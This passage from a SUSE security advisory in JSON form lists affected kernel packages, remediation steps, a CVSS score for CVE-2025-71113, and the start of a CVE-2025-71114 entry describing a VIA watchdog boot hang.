"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71113",
"url": "https://www.suse.com/security/cve/CVE-2025-71113"
},
{
"category": "external",
"summary": "SUSE Bug 1256716 for CVE-2025-71113",
"url": "https://bugzilla.suse.com/1256716"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71113"
},
{
"cve": "CVE-2025-71114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71114"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvia_wdt: fix critical boot hang due to unnamed resource allocation\n\nThe VIA watchdog driver uses allocate_resource() to reserve a MMIO\nregion for the watchdog control register. However, the allocated\nresource was not given a name, which causes the kernel resource tree\nto contain an entry marked as \"\u003cBAD\u003e\" under /proc/iomem on x86\nplatforms.\n\nDuring boot, this unnamed resource can lead to a critical hang because\nsubsequent resource lookups and conflict checks fail to handle the\ninvalid entry properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
